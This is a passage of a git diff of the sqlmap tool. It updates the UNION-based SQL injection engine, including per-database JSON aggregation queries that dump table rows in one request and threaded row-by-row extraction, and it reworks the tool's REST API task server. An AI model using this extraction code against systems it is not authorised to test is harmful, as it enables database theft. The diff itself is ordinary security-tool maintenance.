ORDER BY clause" + singleTimeDebugMessage(debugMsg) + + expression = re.sub(r"\s*ORDER BY [^ ]+\Z", "", expression) + retVal = _oneShotUnionUse(expression, unpack, limited) + + elif kb.nchar and re.search(r" AS N(CHAR|VARCHAR)", agent.nullAndCastField(expression)): + debugMsg = "turning off NATIONAL CHARACTER casting" # NOTE: in some cases there are "known" incompatibilities between original columns and NCHAR (e.g. http://testphp.vulnweb.com/artists.php?artist=1) + singleTimeDebugMessage(debugMsg) + + kb.nchar = False + retVal = _oneShotUnionUse(expression, unpack, limited) + else: + vector = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector + kb.unionDuplicates = vector[7] return retVal def configUnion(char=None, columns=None): def _configUnionChar(char): - if not isinstance(char, basestring): + if not isinstance(char, six.string_types): return kb.uChar = char if conf.uChar is not None: - kb.uChar = char.replace("[CHAR]", conf.uChar if conf.uChar.isdigit() else "'%s'" % conf.uChar.strip("'")) + kb.uChar = char.replace("[CHAR]", conf.uChar if isDigit(conf.uChar) else "'%s'" % conf.uChar.strip("'")) def _configUnionCols(columns): - if not isinstance(columns, basestring): + if not isinstance(columns, six.string_types): return - columns = columns.replace(" ", "") - if "-" in columns: - colsStart, colsStop = columns.split("-") + columns = columns.replace(' ', "") + if '-' in columns: + colsStart, colsStop = columns.split('-') else: colsStart, colsStop = columns, columns - if not colsStart.isdigit() or not colsStop.isdigit(): + if not isDigit(colsStart) or not isDigit(colsStop): raise SqlmapSyntaxException("--union-cols must be a range of integers") conf.uColsStart, conf.uColsStop = int(colsStart), int(colsStop) if conf.uColsStart > conf.uColsStop: - errMsg = "--union-cols range has to be from lower to " + errMsg = "--union-cols range has to represent lower to " errMsg += "higher number of columns" raise SqlmapSyntaxException(errMsg) @@ -144,9 +239,9 @@ def _configUnionCols(columns): def unionUse(expression, unpack=True, dump=False): """ - This function tests for an union SQL injection on the target - url then call its subsidiary function to effectively perform an - union SQL injection on the affected url + This function tests for an UNION SQL injection on the target + URL then call its subsidiary function to effectively perform an + UNION SQL injection on the affected URL """ initTechnique(PAYLOAD.TECHNIQUE.UNION) @@ -163,24 +258,40 @@ def unionUse(expression, unpack=True, dump=False): _, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(origExpr) + # Set kb.partRun in case the engine is called from the API + kb.partRun = getPartRun(alias=False) if conf.api else None + if expressionFieldsList and len(expressionFieldsList) > 1 and "ORDER BY" in expression.upper(): # Removed ORDER BY clause because UNION does not play well with it - expression = re.sub("\s*ORDER BY\s+[\w,]+", "", expression, re.I) + expression = re.sub(r"(?i)\s*ORDER BY\s+[\w,]+", "", expression) debugMsg = "stripping ORDER BY clause from statement because " debugMsg += "it does not play well with UNION query SQL injection" singleTimeDebugMessage(debugMsg) + if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.ORACLE, DBMS.PGSQL, DBMS.MSSQL, DBMS.SQLITE) and expressionFields and not any((conf.binaryFields, conf.limitStart, conf.limitStop, conf.forcePartial, conf.disableJson)): + match = re.search(r"SELECT\s*(.+?)\bFROM", expression, re.I) + if match and not (Backend.isDbms(DBMS.ORACLE) and FROM_DUMMY_TABLE[DBMS.ORACLE] in expression) and not re.search(r"\b(MIN|MAX|COUNT|EXISTS)\(", expression): + kb.jsonAggMode = True + if Backend.isDbms(DBMS.MYSQL): + query = expression.replace(expressionFields, "CONCAT('%s',JSON_ARRAYAGG(CONCAT_WS('%s',%s)),'%s')" % (kb.chars.start, kb.chars.delimiter, ','.join(agent.nullAndCastField(field) for field in expressionFieldsList), kb.chars.stop), 1) + elif Backend.isDbms(DBMS.ORACLE): + query = expression.replace(expressionFields, "'%s'||JSON_ARRAYAGG(%s)||'%s'" % (kb.chars.start, ("||'%s'||" % kb.chars.delimiter).join(expressionFieldsList), kb.chars.stop), 1) + elif Backend.isDbms(DBMS.SQLITE): + query = expression.replace(expressionFields, "'%s'||JSON_GROUP_ARRAY(%s)||'%s'" % (kb.chars.start, ("||'%s'||" % kb.chars.delimiter).join("COALESCE(%s,' ')" % field for field in expressionFieldsList), kb.chars.stop), 1) + elif Backend.isDbms(DBMS.PGSQL): # Note: ARRAY_AGG does CSV alike output, thus enclosing start/end inside each item + query = expression.replace(expressionFields, "ARRAY_AGG('%s'||%s||'%s')::text" % (kb.chars.start, ("||'%s'||" % kb.chars.delimiter).join("COALESCE(%s::text,' ')" % field for field in expressionFieldsList), kb.chars.stop), 1) + elif Backend.isDbms(DBMS.MSSQL): + query = "'%s'+(%s FOR JSON AUTO, INCLUDE_NULL_VALUES)+'%s'" % (kb.chars.start, expression, kb.chars.stop) + output = _oneShotUnionUse(query, False) + value = parseUnionPage(output) + kb.jsonAggMode = False + # We have to check if the SQL query might return multiple entries # if the technique is partial UNION query and in such case forge the # SQL limiting the query output one entry at a time # NOTE: we assume that only queries that get data from a table can # return multiple entries - if (kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.NEGATIVE or \ - (dump and (conf.limitStart or conf.limitStop)) or "LIMIT " in expression.upper()) and \ - " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() \ - not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE \ - and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) \ - and not re.search(SQL_SCALAR_REGEX, expression, re.I): + if value is None and (kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.NEGATIVE or kb.forcePartialUnion or conf.forcePartial or (dump and (conf.limitStart or conf.limitStop)) or "LIMIT " in expression.upper()) and " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) and not re.search(SQL_SCALAR_REGEX, expression, re.I): expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression, dump) if limitCond: @@ -200,127 +311,157 @@ def unionUse(expression, unpack=True, dump=False): else: stopLimit = int(count) - infoMsg = "the SQL query used returns " - infoMsg += "%d entries" % stopLimit - logger.info(infoMsg) + debugMsg = "used SQL query returns " + debugMsg += "%d %s" % (stopLimit, "entries" if stopLimit > 1 else "entry") + logger.debug(debugMsg) - elif count and (not isinstance(count, basestring) or not count.isdigit()): + elif count and (not isinstance(count, six.string_types) or not count.isdigit()): warnMsg = "it was not possible to count the number " warnMsg += "of entries for the SQL query provided. " warnMsg += "sqlmap will assume that it returns only " warnMsg += "one entry" - logger.warn(warnMsg) + logger.warning(warnMsg) stopLimit = 1 - elif (not count or int(count) == 0): + elif not isNumPosStrValue(count): if not count: warnMsg = "the SQL query provided does not " warnMsg += "return any output" - logger.warn(warnMsg) + logger.warning(warnMsg) else: value = [] # for empty tables return value - threadData = getCurrentThreadData() - threadData.shared.limits = iter(xrange(startLimit, stopLimit)) - numThreads = min(conf.threads, (stopLimit - startLimit)) - threadData.shared.value = BigArray() - threadData.shared.buffered = [] - threadData.shared.lastFlushed = startLimit - 1 + if isNumPosStrValue(count) and int(count) > 1: + threadData = getCurrentThreadData() + + try: + threadData.shared.limits = iter(xrange(startLimit, stopLimit)) + except OverflowError: + errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (startLimit, stopLimit) + errMsg += "with switch '--fresh-queries'" + raise SqlmapDataException(errMsg) + + numThreads = min(conf.threads, (stopLimit - startLimit)) + threadData.shared.value = BigArray() + threadData.shared.buffered = [] + threadData.shared.counter = 0 + threadData.shared.lastFlushed = startLimit - 1 + threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1 + + if threadData.shared.showEta: + threadData.shared.progress = ProgressBar(maxValue=(stopLimit - startLimit)) + + if stopLimit > TURN_OFF_RESUME_INFO_LIMIT: + kb.suppressResumeInfo = True + debugMsg = "suppressing possible resume console info for " + debugMsg += "large number of rows as it might take too long" + logger.debug(debugMsg) + + try: + def unionThread(): + threadData = getCurrentThreadData() + + while kb.threadContinue: + with kb.locks.limit: + try: + threadData.shared.counter += 1 + num = next(threadData.shared.limits) + except StopIteration: + break + + if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE): + field = expressionFieldsList[0] + elif Backend.isDbms(DBMS.ORACLE): + field = expressionFieldsList + else: + field = None - if stopLimit > TURN_OFF_RESUME_INFO_LIMIT: - kb.suppressResumeInfo = True - debugMsg = "suppressing possible resume console info because of " - debugMsg += "large number of rows. It might take too long" - logger.debug(debugMsg) + limitedExpr = agent.limitQuery(num, expression, field) + output = _oneShotUnionUse(limitedExpr, unpack, True) - try: - def unionThread(): - threadData = getCurrentThreadData() - - while kb.threadContinue: - with kb.locks.limit: - try: - num = threadData.shared.limits.next() - except StopIteration: + if not kb.threadContinue: break - if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE): - field = expressionFieldsList[0] - elif Backend.isDbms(DBMS.ORACLE): - field = expressionFieldsList - else: - field = None - - limitedExpr = agent.limitQuery(num, expression, field) - output = _oneShotUnionUse(limitedExpr, unpack, True) - - if not kb.threadContinue: - break - - if output: - if all(map(lambda _: _ in output, (kb.chars.start, kb.chars.stop))): - items = parseUnionPage(output) - + if output: with kb.locks.value: - # in case that we requested N columns and we get M!=N then we have to filter a bit - if isListLike(items) and len(items) > 1 and len(expressionFieldsList) > 1: - items = [item for item in items if isListLike(item) and len(item) == len(expressionFieldsList)] - index = None - for index in xrange(len(threadData.shared.buffered)): - if threadData.shared.buffered[index][0] >= num: - break - threadData.shared.buffered.insert(index or 0, (num, items)) - while threadData.shared.buffered and threadData.shared.lastFlushed + 1 == threadData.shared.buffered[0][0]: - threadData.shared.lastFlushed += 1 - _ = threadData.shared.buffered[0][1] + if all(_ in output for _ in (kb.chars.start, kb.chars.stop)): + items = parseUnionPage(output) + + if threadData.shared.showEta: + threadData.shared.progress.progress(threadData.shared.counter) + if isListLike(items): + # in case that we requested N columns and we get M!=N then we have to filter a bit + if len(items) > 1 and len(expressionFieldsList) > 1: + items = [item for item in items if isListLike(item) and len(item) == len(expressionFieldsList)] + items = [_ for _ in flattenValue(items)] + if len(items) > len(expressionFieldsList): + filtered = OrderedDict() + for item in items: + key = re.sub(r"[^A-Za-z0-9]", "", item).lower() + if key not in filtered or re.search(r"[^A-Za-z0-9]", item): + filtered[key] = item + items = list(six.itervalues(filtered)) + items = [items] + index = None + for index in xrange(1 + len(threadData.shared.buffered)): + if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num: + break + threadData.shared.buffered.insert(index or 0, (num, items)) + else: + index = None + if threadData.shared.showEta: + threadData.shared.progress.progress(threadData.shared.counter) + for index in xrange(1 + len(threadData.shared.buffered)): + if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num: + break + threadData.shared.buffered.insert(index or 0, (num, None)) + + items = output.replace(kb.chars.start, "").replace(kb.chars.stop, "").split(kb.chars.delimiter) + + while threadData.shared.buffered and (threadData.shared.lastFlushed + 1 >= threadData.shared.buffered[0][0] or len(threadData.shared.buffered) > MAX_BUFFERED_PARTIAL_UNION_LENGTH): + threadData.shared.lastFlushed, _ = threadData.shared.buffered[0] if not isNoneValue(_): threadData.shared.value.extend(arrayizeValue(_)) del threadData.shared.buffered[0] - else: - with kb.locks.value: - index = None - for index in xrange(len(threadData.shared.buffered)): - if threadData.shared.buffered[index][0] >= num: - break - threadData.shared.buffered.insert(index or 0, (num, None)) - items = output.replace(kb.chars.start, "").replace(kb.chars.stop, "").split(kb.chars.delimiter) - if conf.verbose == 1 and not (threadData.resumed and kb.suppressResumeInfo): - status = "[%s] [INFO] %s: %s" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", safecharencode(",".join("\"%s\"" % _ for _ in flattenValue(arrayizeValue(items))))) + if conf.verbose == 1 and not (threadData.resumed and kb.suppressResumeInfo) and not threadData.shared.showEta and not kb.bruteMode: + _ = ','.join("'%s'" % _ for _ in (flattenValue(arrayizeValue(items)) if not isinstance(items, six.string_types) else [items])) + status = "[%s] [INFO] %s: %s" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", _ if kb.safeCharEncode else safecharencode(_)) - if len(status) > width: - status = "%s..." % status[:width - 3] + if len(status) > width and not conf.noTruncate: + status = "%s..." % status[:width - 3] - dataToStdout("%s\r\n" % status, True) + dataToStdout("%s\n" % status) - runThreads(numThreads, unionThread) + runThreads(numThreads, unionThread) - if conf.verbose == 1: - clearConsoleLine(True) + if conf.verbose == 1: + clearConsoleLine(True) - except KeyboardInterrupt: - abortedFlag = True + except KeyboardInterrupt: + abortedFlag = True - warnMsg = "user aborted during enumeration. sqlmap " - warnMsg += "will display partial output" - logger.warn(warnMsg) + warnMsg = "user aborted during enumeration. sqlmap " + warnMsg += "will display partial output" + logger.warning(warnMsg) - finally: - for _ in sorted(threadData.shared.buffered): - if not isNoneValue(_[1]): - threadData.shared.value.extend(arrayizeValue(_[1])) - value = threadData.shared.value - kb.suppressResumeInfo = False + finally: + for _ in sorted(threadData.shared.buffered): + if not isNoneValue(_[1]): + threadData.shared.value.extend(arrayizeValue(_[1])) + value = threadData.shared.value + kb.suppressResumeInfo = False if not value and not abortedFlag: - value = _oneShotUnionUse(expression, unpack) + output = _oneShotUnionUse(expression, unpack) + value = parseUnionPage(output) duration = calculateDeltaSeconds(start) if not kb.bruteMode: - debugMsg = "performed %d queries in %d seconds" % (kb.counters[PAYLOAD.TECHNIQUE.UNION], duration) + debugMsg = "performed %d quer%s in %.2f seconds" % (kb.counters[PAYLOAD.TECHNIQUE.UNION], 'y' if kb.counters[PAYLOAD.TECHNIQUE.UNION] == 1 else "ies", duration) logger.debug(debugMsg) return value diff --git a/lib/utils/__init__.py b/lib/utils/__init__.py index 9e1072a9c4f..bcac841631b 100644 --- a/lib/utils/__init__.py +++ b/lib/utils/__init__.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ pass diff --git a/lib/utils/api.py b/lib/utils/api.py index 92667353606..b0242b3adf7 100644 --- a/lib/utils/api.py +++ b/lib/utils/api.py @@ -1,119 +1,161 @@ #!/usr/bin/env python +# -*- coding: utf-8 -*- """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +from __future__ import print_function + +import contextlib import logging import os -import shutil +import re +import shlex +import socket import sqlite3 import sys import tempfile +import threading import time -from subprocess import PIPE - +from lib.core.common import dataToStdout +from lib.core.common import getSafeExString +from lib.core.common import openFile +from lib.core.common import saveConfig +from lib.core.common import setColor from lib.core.common import unArrayizeValue -from lib.core.convert import base64pickle -from lib.core.convert import base64unpickle -from lib.core.convert import hexencode +from lib.core.compat import xrange +from lib.core.convert import decodeBase64 from lib.core.convert import dejsonize +from lib.core.convert import encodeBase64 +from lib.core.convert import encodeHex +from lib.core.convert import getBytes +from lib.core.convert import getText from lib.core.convert import jsonize from lib.core.data import conf -from lib.core.data import paths +from lib.core.data import kb from lib.core.data import logger +from lib.core.data import paths from lib.core.datatype import AttribDict from lib.core.defaults import _defaults +from lib.core.dicts import PART_RUN_CONTENT_TYPES +from lib.core.enums import AUTOCOMPLETE_TYPE +from lib.core.enums import CONTENT_STATUS +from lib.core.enums import MKSTEMP_PREFIX +from lib.core.exception import SqlmapConnectionException from lib.core.log import LOGGER_HANDLER from lib.core.optiondict import optDict +from lib.core.settings import IS_WIN +from lib.core.settings import RESTAPI_DEFAULT_ADAPTER +from lib.core.settings import RESTAPI_DEFAULT_ADDRESS +from lib.core.settings import RESTAPI_DEFAULT_PORT +from lib.core.settings import RESTAPI_UNSUPPORTED_OPTIONS +from lib.core.settings import VERSION_STRING +from lib.core.shell import autoCompletion from lib.core.subprocessng import Popen -from lib.core.subprocessng import send_all -from lib.core.subprocessng import recv_some -from thirdparty.bottle.bottle import abort -from thirdparty.bottle.bottle import error +from lib.parse.cmdline import cmdLineParser +from thirdparty.bottle.bottle import error as return_error from thirdparty.bottle.bottle import get from thirdparty.bottle.bottle import hook from thirdparty.bottle.bottle import post from thirdparty.bottle.bottle import request from thirdparty.bottle.bottle import response from thirdparty.bottle.bottle import run -from thirdparty.bottle.bottle import static_file - -RESTAPI_SERVER_HOST = "127.0.0.1" -RESTAPI_SERVER_PORT = 8775 - -# Local global variables -adminid = "" -db = None -tasks = dict() +from thirdparty.bottle.bottle import server_names +from thirdparty import six +from thirdparty.six.moves import http_client as _http_client +from thirdparty.six.moves import input as _input +from thirdparty.six.moves import urllib as _urllib + +# Global data storage +class DataStore(object): + admin_token = "" + current_db = None + tasks = dict() + username = None + password = None # API objects class Database(object): - LOGS_TABLE = "CREATE TABLE logs(id INTEGER PRIMARY KEY AUTOINCREMENT, taskid INTEGER, time TEXT, level TEXT, message TEXT)" - DATA_TABLE = "CREATE TABLE data(id INTEGER PRIMARY KEY AUTOINCREMENT, taskid INTEGER, status INTEGER, content_type INTEGER, value TEXT)" - ERRORS_TABLE = "CREATE TABLE errors(id INTEGER PRIMARY KEY AUTOINCREMENT, taskid INTEGER, error TEXT)" + filepath = None - def __init__(self): - pass - - def create(self): - _, self.database = tempfile.mkstemp(prefix="sqlmapipc-", text=False) - logger.info("IPC database is %s" % self.database) + def __init__(self, database=None): + self.database = self.filepath if database is None else database + self.connection = None + self.cursor = None - def connect(self): - self.connection = sqlite3.connect(self.database, timeout=1, isolation_level=None) + def connect(self, who="server"): + self.connection = sqlite3.connect(self.database, timeout=3, isolation_level=None, check_same_thread=False) self.cursor = self.connection.cursor() + self.lock = threading.Lock() + logger.debug("REST-JSON API %s connected to IPC database" % who) def disconnect(self): - self.cursor.close() - self.connection.close() + if self.cursor: + self.cursor.close() + + if self.connection: + self.connection.close() + + def commit(self): + self.connection.commit() def execute(self, statement, arguments=None): - if arguments: - self.cursor.execute(statement, arguments) - else: - self.cursor.execute(statement) + with self.lock: + while True: + try: + if arguments: + self.cursor.execute(statement, arguments) + else: + self.cursor.execute(statement) + except sqlite3.OperationalError as ex: + if "locked" not in getSafeExString(ex): + raise + else: + time.sleep(1) + else: + break if statement.lstrip().upper().startswith("SELECT"): return self.cursor.fetchall() - def initialize(self): - self.create() - self.connect() - self.execute(self.LOGS_TABLE) - self.execute(self.DATA_TABLE) - self.execute(self.ERRORS_TABLE) - - def get_filepath(self): - return self.database + def init(self): + self.execute("CREATE TABLE IF NOT EXISTS logs(id INTEGER PRIMARY KEY AUTOINCREMENT, taskid INTEGER, time TEXT, level TEXT, message TEXT)") + self.execute("CREATE TABLE IF NOT EXISTS data(id INTEGER PRIMARY KEY AUTOINCREMENT, taskid INTEGER, status INTEGER, content_type INTEGER, value TEXT)") + self.execute("CREATE TABLE IF NOT EXISTS errors(id INTEGER PRIMARY KEY AUTOINCREMENT, taskid INTEGER, error TEXT)") class Task(object): - global db - - def __init__(self, taskid): + def __init__(self, taskid, remote_addr): + self.remote_addr = remote_addr self.process = None self.output_directory = None + self.options = None + self._original_options = None self.initialize_options(taskid) def initialize_options(self, taskid): - dataype = {"boolean": False, "string": None, "integer": None, "float": None} + datatype = {"boolean": False, "string": None, "integer": None, "float": None} self.options = AttribDict() for _ in optDict: for name, type_ in optDict[_].items(): type_ = unArrayizeValue(type_) - self.options[name] = _defaults.get(name, dataype[type_]) + self.options[name] = _defaults.get(name, datatype[type_]) - # Let sqlmap engine knows it is getting called by the API, the task ID and the file path of the IPC database + # Let sqlmap engine knows it is getting called by the API, + # the task ID and the file path of the IPC database self.options.api = True self.options.taskid = taskid - self.options.database = db.get_filepath() + self.options.database = Database.filepath - # Enforce batch mode and disable coloring + # Enforce batch mode and disable coloring and ETA self.options.batch = True self.options.disableColoring = True + self.options.eta = False + + self._original_options = AttribDict(self.options) def set_option(self, option, value): self.options[option] = value @@ -124,31 +166,60 @@ def get_option(self, option): def get_options(self): return self.options - def set_output_directory(self): - self.output_directory = tempfile.mkdtemp(prefix="sqlmapoutput-") - self.set_option("oDir", self.output_directory) - - def clean_filesystem(self): - shutil.rmtree(self.output_directory) + def reset_options(self): + self.options = AttribDict(self._original_options) def engine_start(self): - self.process = Popen("python sqlmap.py --pickled-options %s" % base64pickle(self.options), shell=True, stdin=PIPE) + handle, configFile = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.CONFIG, text=True) + os.close(handle) + saveConfig(self.options, configFile) + + if os.path.exists("sqlmap.py"): + self.process = Popen([sys.executable or "python", "sqlmap.py", "--api", "-c", configFile], shell=False, close_fds=not IS_WIN) + elif os.path.exists(os.path.join(os.getcwd(), "sqlmap.py")): + self.process = Popen([sys.executable or "python", "sqlmap.py", "--api", "-c", configFile], shell=False, cwd=os.getcwd(), close_fds=not IS_WIN) + elif os.path.exists(os.path.join(os.path.abspath(os.path.dirname(sys.argv[0])), "sqlmap.py")): + self.process = Popen([sys.executable or "python", "sqlmap.py", "--api", "-c", configFile], shell=False, cwd=os.path.join(os.path.abspath(os.path.dirname(sys.argv[0]))), close_fds=not IS_WIN) + else: + self.process = Popen(["sqlmap", "--api", "-c", configFile], shell=False, close_fds=not IS_WIN) def engine_stop(self): if self.process: self.process.terminate() + return self.process.wait() + else: + return None + + def engine_process(self): + return self.process def engine_kill(self): if self.process: - self.process.kill() + try: + self.process.kill() + return self.process.wait() + except: + pass + return None + + def engine_get_id(self): + if self.process: + return self.process.pid + else: + return None - def engine_get_pid(self): - return self.processid.pid + def engine_get_returncode(self): + if self.process: + self.process.poll() + return self.process.returncode + else: + return None + + def engine_has_terminated(self): + return isinstance(self.engine_get_returncode(), int) # Wrapper functions for sqlmap engine class StdDbOut(object): - encoding = "UTF-8" - def __init__(self, taskid, messagetype="stdout"): # Overwrite system standard output and standard error to write # to an IPC database @@ -160,11 +231,35 @@ def __init__(self, taskid, messagetype="stdout"): else: sys.stderr = self - def write(self, value, status=None, content_type=None): + def write(self, value, status=CONTENT_STATUS.IN_PROGRESS, content_type=None): if self.messagetype == "stdout": - conf.database_cursor.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)", (self.taskid, status, content_type, jsonize(value))) + if content_type is None: + if kb.partRun is not None: + content_type = PART_RUN_CONTENT_TYPES.get(kb.partRun) + else: + # Ignore all non-relevant messages + return + + output = conf.databaseCursor.execute("SELECT id, status, value FROM data WHERE taskid = ? AND content_type = ?", (self.taskid, content_type)) + + # Delete partial output from IPC database if we have got a complete output + if status == CONTENT_STATUS.COMPLETE: + if len(output) > 0: + for index in xrange(len(output)): + conf.databaseCursor.execute("DELETE FROM data WHERE id = ?", (output[index][0],)) + + conf.databaseCursor.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)", (self.taskid, status, content_type, jsonize(value))) + if kb.partRun: + kb.partRun = None + + elif status == CONTENT_STATUS.IN_PROGRESS: + if len(output) == 0: + conf.databaseCursor.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)", (self.taskid, status, content_type, jsonize(value))) + else: + new_value = "%s%s" % (dejsonize(output[0][2]), value) + conf.databaseCursor.execute("UPDATE data SET value = ? WHERE id = ?", (jsonize(new_value), output[0][0])) else: - conf.database_cursor.execute("INSERT INTO errors VALUES(NULL, ?, ?)", (self.taskid, value)) + conf.databaseCursor.execute("INSERT INTO errors VALUES(NULL, ?, ?)", (self.taskid, str(value) if value else "")) def flush(self): pass @@ -181,14 +276,15 @@ def emit(self, record): Record emitted events to IPC database for asynchronous I/O communication with the parent process """ - conf.database_cursor.execute("INSERT INTO logs VALUES(NULL, ?, ?, ?, ?)", - (conf.taskid, time.strftime("%X"), record.levelname, - record.msg % record.args if record.args else record.msg)) + conf.databaseCursor.execute("INSERT INTO logs VALUES(NULL, ?, ?, ?, ?)", (conf.taskid, time.strftime("%X"), record.levelname, str(record.msg % record.args if record.args else record.msg))) def setRestAPILog(): - if hasattr(conf, "api"): - conf.database_connection = sqlite3.connect(conf.database, timeout=1, isolation_level=None) - conf.database_cursor = conf.database_connection.cursor() + if conf.api: + try: + conf.databaseCursor = Database(conf.database) + conf.databaseCursor.connect("client") + except sqlite3.OperationalError as ex: + raise SqlmapConnectionException("%s ('%s')" % (ex, conf.database)) # Set a logging handler that writes log messages to a IPC database logger.removeHandler(LOGGER_HANDLER) @@ -196,12 +292,31 @@ def setRestAPILog(): logger.addHandler(LOGGER_RECORDER) # Generic functions -def is_admin(taskid): - global adminid - if adminid != taskid: - return False +def is_admin(token): + return DataStore.admin_token == token + +@hook('before_request') +def check_authentication(): + if not any((DataStore.username, DataStore.password)): + return + + authorization = request.headers.get("Authorization", "") + match = re.search(r"(?i)\ABasic\s+([^\s]+)", authorization) + + if not match: + request.environ["PATH_INFO"] = "/error/401" + + try: + creds = decodeBase64(match.group(1), binary=False) + except: + request.environ["PATH_INFO"] = "/error/401" else: - return True + if creds.count(':') != 1: + request.environ["PATH_INFO"] = "/error/401" + else: + username, password = creds.split(':') + if username.strip() != (DataStore.username or "") or password.strip() != (DataStore.password or ""): + request.environ["PATH_INFO"] = "/error/401" @hook("after_request") def security_headers(json_header=True): @@ -215,6 +330,7 @@ def security_headers(json_header=True): response.headers["Pragma"] = "no-cache" response.headers["Cache-Control"] = "no-cache" response.headers["Expires"] = "0" + if json_header: response.content_type = "application/json; charset=UTF-8" @@ -222,26 +338,35 @@ def security_headers(json_header=True): # HTTP Status Code functions # ############################## -@error(401) # Access Denied +@return_error(401) # Access Denied def error401(error=None): security_headers(False) return "Access denied" -@error(404) # Not Found +@return_error(404) # Not Found def error404(error=None): security_headers(False) return "Nothing here" -@error(405) # Method Not Allowed (e.g. when requesting a POST method via GET) +@return_error(405) # Method Not Allowed (e.g. when requesting a POST method via GET) def error405(error=None): security_headers(False) return "Method not allowed" -@error(500) # Internal Server Error +@return_error(500) # Internal Server Error def error500(error=None): security_headers(False) return "Internal server error" +############# +# Auxiliary # +############# + +@get('/error/401') +def path_401(): + response.status = 401 + return response + ############################# # Task management functions # ############################# @@ -250,199 +375,230 @@ def error500(error=None): @get("/task/new") def task_new(): """ - Create new task ID + Create a new task """ - global tasks + taskid = encodeHex(os.urandom(8), binary=False) + remote_addr = request.remote_addr - taskid = hexencode(os.urandom(8)) - tasks[taskid] = Task(taskid) + DataStore.tasks[taskid] = Task(taskid, remote_addr) - return jsonize({"taskid": taskid}) + logger.debug("Created new task: '%s'" % taskid) + return jsonize({"success": True, "taskid": taskid}) -@get("/task/<taskid>/destroy") -def task_destroy(taskid): +@get("/task/<taskid>/delete") +def task_delete(taskid): """ - Destroy own task ID + Delete an existing task """ - if taskid in tasks: - tasks[taskid].clean_filesystem() - tasks.pop(taskid) + if taskid in DataStore.tasks: + DataStore.tasks.pop(taskid) + + logger.debug("(%s) Deleted task" % taskid) return jsonize({"success": True}) else: - abort(500, "Invalid task ID") + response.status = 404 + logger.warning("[%s] Non-existing task ID provided to task_delete()" % taskid) + return jsonize({"success": False, "message": "Non-existing task ID"}) + +################### +# Admin functions # +################### -# Admin's methods -@get("/task/<taskid>/list") -def task_list(taskid): +@get("/admin/list") +@get("/admin/<token>/list") +def task_list(token=None): """ - List all active tasks + Pull task list """ - if is_admin(taskid): - return jsonize({"tasks": tasks}) - else: - abort(401) + tasks = {} + + for key in DataStore.tasks: + if is_admin(token) or DataStore.tasks[key].remote_addr == request.remote_addr: + tasks[key] = dejsonize(scan_status(key))["status"] -@get("/task/<taskid>/flush") -def task_flush(taskid): + logger.debug("(%s) Listed task pool (%s)" % (token, "admin" if is_admin(token) else request.remote_addr)) + return jsonize({"success": True, "tasks": tasks, "tasks_num": len(tasks)}) + +@get("/admin/flush") +@get("/admin/<token>/flush") +def task_flush(token=None): """ - Flush task spool (destroy all tasks) + Flush task spool (delete all tasks) """ - global tasks - if is_admin(taskid): - for task in tasks: - tasks[task].clean_filesystem() + for key in list(DataStore.tasks): + if is_admin(token) or DataStore.tasks[key].remote_addr == request.remote_addr: + DataStore.tasks[key].engine_kill() + del DataStore.tasks[key] - tasks = dict() - return jsonize({"success": True}) - else: - abort(401) + logger.debug("(%s) Flushed task pool (%s)" % (token, "admin" if is_admin(token) else request.remote_addr)) + return jsonize({"success": True}) ################################## # sqlmap core interact functions # ################################## -# Admin's methods -@get("/status/<taskid>") -def status(taskid): - """ - Verify the status of the API as well as the core - """ - - if is_admin(taskid): - tasks_num = len(tasks) - return jsonize({"tasks": tasks_num}) - else: - abort(401) - -# Functions to handle options +# Handle task's options @get("/option/<taskid>/list") def option_list(taskid): """ List options for a certain task ID """ - if taskid not in tasks: - abort(500, "Invalid task ID") + if taskid not in DataStore.tasks: + logger.warning("[%s] Invalid task ID provided to option_list()" % taskid) + return jsonize({"success": False, "message": "Invalid task ID"}) - return jsonize(tasks[taskid].get_options()) + logger.debug("(%s) Listed task options" % taskid) + return jsonize({"success": True, "options": DataStore.tasks[taskid].get_options()}) @post("/option/<taskid>/get") def option_get(taskid): """ - Get the value of an option (command line switch) for a certain task ID + Get value of option(s) for a certain task ID """ - if taskid not in tasks: - abort(500, "Invalid task ID") + if taskid not in DataStore.tasks: + logger.warning("[%s] Invalid task ID provided to option_get()" % taskid) + return jsonize({"success": False, "message": "Invalid task ID"}) - option = request.json.get("option", "") + options = request.json or [] + results = {} - if option in tasks[taskid]: - return jsonize({option: tasks[taskid].get_option(option)}) - else: - return jsonize({option: None}) + for option in options: + if option in DataStore.tasks[taskid].options: + results[option] = DataStore.tasks[taskid].options[option] + else: + logger.debug("(%s) Requested value for unknown option '%s'" % (taskid, option)) + return jsonize({"success": False, "message": "Unknown option 